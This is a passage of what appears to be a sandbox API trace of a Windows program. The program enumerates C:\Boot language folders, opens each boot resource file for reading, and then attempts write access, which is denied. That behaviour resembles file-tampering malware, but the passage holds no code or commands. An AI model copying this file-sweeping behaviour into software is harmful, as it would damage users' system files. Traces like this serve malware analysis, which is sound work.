hHeap=0x20000) returned 1 [0084.483] AreFileApisANSI () returned 1 [0084.483] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\tr-TR\\bootmgr.exe.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\tr-TR\\bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0084.483] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0084.483] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.483] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.483] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0084.483] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0084.483] AreFileApisANSI () returned 1 [0084.483] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x887c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0084.483] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x52dd0 [0084.483] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x887c0, cbMultiByte=-1, lpWideCharStr=0x52dd0, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\tr-TR\\bootmgr.exe.mui") returned 30 [0084.483] CreateFileW (lpFileName="C:\\Boot\\tr-TR\\bootmgr.exe.mui" (normalized: "c:\\boot\\tr-tr\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x354 [0084.483] GetFileType (hFile=0x354) returned 0x1 [0084.483] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x52dd0 | out: hHeap=0x20000) returned 1 [0084.483] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0084.484] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0084.484] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0084.484] CloseHandle (hObject=0x354) returned 1 [0084.484] AreFileApisANSI () returned 1 [0084.484] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x887c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0084.484] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x52dd0 [0084.484] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x887c0, cbMultiByte=-1, lpWideCharStr=0x52dd0, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\tr-TR\\bootmgr.exe.mui") returned 30 [0084.484] CreateFileW (lpFileName="C:\\Boot\\tr-TR\\bootmgr.exe.mui" (normalized: "c:\\boot\\tr-tr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.484] GetLastError () returned 0x5 [0084.484] GetLastError () returned 0x5 [0084.484] SetLastError (dwErrCode=0x5) [0084.484] GetLastError () returned 0x5 [0084.484] SetLastError (dwErrCode=0x5) [0084.484] GetLastError () returned 0x5 [0084.484] SetLastError (dwErrCode=0x5) [0084.484] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x52dd0 | out: hHeap=0x20000) returned 1 [0084.485] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0084.485] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0084.485] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0084.485] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.485] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.485] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6b5aca, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2f4373a, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0084.485] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0084.485] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0084.485] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0084.485] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0084.485] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0084.485] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0084.485] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0084.485] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0084.485] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0084.485] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0084.485] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0084.485] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0084.485] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0084.485] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0084.485] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0084.485] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0084.485] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0084.485] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0084.485] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0084.485] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x52fc8 [0084.485] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0084.485] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0084.485] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x52dd0 [0084.485] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x52fc8 | out: hHeap=0x20000) returned 1 [0084.485] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.485] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.485] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.485] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.485] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x52dd0 | out: hHeap=0x20000) returned 1 [0084.486] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0084.486] AreFileApisANSI () returned 1 [0084.486] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\tr-TR\\memtest.exe.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\tr-TR\\memtest.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0084.486] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0084.486] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.486] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.486] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0084.486] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0084.486] AreFileApisANSI () returned 1 [0084.486] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88680, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0084.486] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x52dd0 [0084.486] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88680, cbMultiByte=-1, lpWideCharStr=0x52dd0, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\tr-TR\\memtest.exe.mui") returned 30 [0084.486] CreateFileW (lpFileName="C:\\Boot\\tr-TR\\memtest.exe.mui" (normalized: "c:\\boot\\tr-tr\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x354 [0084.486] GetFileType (hFile=0x354) returned 0x1 [0084.486] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x52dd0 | out: hHeap=0x20000) returned 1 [0084.486] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0084.487] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0084.487] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0084.487] CloseHandle (hObject=0x354) returned 1 [0084.487] AreFileApisANSI () returned 1 [0084.487] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88680, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0084.487] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x52dd0 [0084.487] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88680, cbMultiByte=-1, lpWideCharStr=0x52dd0, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\tr-TR\\memtest.exe.mui") returned 30 [0084.487] CreateFileW (lpFileName="C:\\Boot\\tr-TR\\memtest.exe.mui" (normalized: "c:\\boot\\tr-tr\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.487] GetLastError () returned 0x5 [0084.487] GetLastError () returned 0x5 [0084.487] SetLastError (dwErrCode=0x5) [0084.487] GetLastError () returned 0x5 [0084.487] SetLastError (dwErrCode=0x5) [0084.487] GetLastError () returned 0x5 [0084.487] SetLastError (dwErrCode=0x5) [0084.487] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x52dd0 | out: hHeap=0x20000) returned 1 [0084.487] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0084.487] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0084.488] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0084.488] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.488] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.488] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x327f510, ftCreationTime.dwHighDateTime=0x3a, ftLastAccessTime.dwLowDateTime=0x327f498, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x68d68, ftLastWriteTime.dwHighDateTime=0x327f288, nFileSizeHigh=0x3a, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧놠")) returned 0 [0084.488] FindClose (in: hFindFile=0x780d0 | out: hFindFile=0x780d0) returned 1 [0084.488] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0084.488] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0084.488] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0084.488] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0084.488] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0084.488] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0084.488] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0084.488] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0084.488] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0084.488] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46ac8 | out: hHeap=0x20000) returned 1 [0084.488] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0084.488] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0084.488] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0084.488] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0084.488] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0084.488] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0084.488] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0084.488] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0084.488] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0084.488] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0084.488] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0084.488] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.488] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.488] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.488] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.488] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0084.488] AreFileApisANSI () returned 1 [0084.488] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\uk-UA", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\uk-UA", lpUsedDefaultChar=0x0) returned 14 [0084.489] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.489] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.489] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0084.489] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0084.489] AreFileApisANSI () returned 1 [0084.489] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0084.489] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x887c0 [0084.489] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x887c0, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\uk-UA") returned 14 [0084.489] CreateFileW (lpFileName="C:\\Boot\\uk-UA" (normalized: "c:\\boot\\uk-ua"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.489] GetLastError () returned 0x5 [0084.489] GetLastError () returned 0x5 [0084.489] SetLastError (dwErrCode=0x5) [0084.489] GetLastError () returned 0x5 [0084.489] SetLastError (dwErrCode=0x5) [0084.489] GetLastError () returned 0x5 [0084.489] SetLastError (dwErrCode=0x5) [0084.489] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0084.489] AreFileApisANSI () returned 1 [0084.489] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0084.489] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x88798 [0084.489] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x88798, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\uk-UA") returned 14 [0084.489] CreateFileW (lpFileName="C:\\Boot\\uk-UA" (normalized: "c:\\boot\\uk-ua"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.490] GetLastError () returned 0x5 [0084.490] GetLastError () returned 0x5 [0084.490] SetLastError (dwErrCode=0x5) [0084.490] GetLastError () returned 0x5 [0084.490] SetLastError (dwErrCode=0x5) [0084.490] GetLastError () returned 0x5 [0084.490] SetLastError (dwErrCode=0x5) [0084.490] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0084.490] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0084.490] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0084.490] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.490] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.490] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.490] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.490] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0084.490] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0084.490] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0084.490] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef6c9427, ftCreationTime.dwHighDateTime=0x1d3273d, ftLastAccessTime.dwLowDateTime=0xef6c9427, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2d79a60, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x1236, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="updaterevokesipolicy.p7b", cAlternateFileName="UPDATE~1.P7B")) returned 1 [0084.490] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0084.490] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0084.490] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0084.490] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68d60 [0084.490] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0084.490] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x52fc8 [0084.490] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x52dd0 [0084.490] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0084.490] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x52dd0 | out: hHeap=0x20000) returned 1 [0084.490] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x52fc8 | out: hHeap=0x20000) returned 1 [0084.490] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0084.490] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x52dd0 [0084.490] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0084.490] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0084.490] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0084.490] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0084.490] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0084.491] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0084.491] FindFirstFileExW (in: lpFileName="C:\\Boot\\uk-UA\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78110 [0084.491] FindNextFileW (in: hFindFile=0x78110, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0206a30, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xc495eef9, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0084.491] FindNextFileW (in: hFindFile=0x78110, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc495eef9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x210e1cce, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12d60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0084.491] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0084.491] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0084.491] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0084.491] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0084.491] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0084.491] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0084.491] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0084.491] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0084.491] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0084.491] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0084.491] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0084.491] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x460b8 [0084.491] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0084.491] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 